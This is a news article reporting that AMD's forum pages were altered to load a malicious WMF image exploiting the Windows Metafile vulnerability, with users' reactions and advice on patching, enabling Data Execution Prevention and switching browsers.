Visitors to AMD's website forums received a shock when their adware and virus scanners started blaring warnings about a possible Trojan horse being downloaded. Over the past few days visitors have been complaining about strange popup alerts and slow forum speeds. Apparently, the forum webpages were modified to include a link to a malicious Windows Metafile (WMF) image hosted on toolbarsdollars.biz. A major WMF vulnerability that allows hackers to hide code inside of image files was disclosed a few weeks ago and many users still have not patched against it.
As typical with many webpages, AMD's forum pages have external php scripts that are loaded with the iframe tag in the webpage. One of those scripts, in turn, calls up a 16 kiloByte image called xpladv586.wmf that was being hosted at toolbarsdollars.biz, which is a well-known adware site. Several users reported that their anti-virus and anti-adware programs detected the WMF as containing a Trojan horse and promptly sent the file into quarantine. They have also posted several pages worth of messages to other forum members detailing what they did to clean up their computers and stop future threats.
Other forums have been hit with similar exploits and there are several steps can be taken to protect your computer against what will likely be a wave of future attacks. The first is to obviously patch your Windows against the WMF exploit. The exploit is discussed in Microsoft's Knowledge Base article #912919 and a patch can be downloaded either through Windows Update or via direct download.
Another tactic is to turn on Data Execution Prevention, a process that George Ou from ZDNet recently detailed in a blog posting. DEP prevents malicious programs from running by declaring certain portions of memory off-limits. Viruses and adware often try to take control of a computer by poking around memory locations and copying portions of code to those areas. Finally, users may want to switch to Mozilla's FireFox browser as the exploit thus far only affects Microsoft's Internet Explorer.
You can read the main thread about the exploit on AMD's website here. Forum officials have posted that the problem has been fixed, but they aren't saying how the attackers accessed the webpages in the first place. We called AMD officials have not yet commented on the hacked forums.
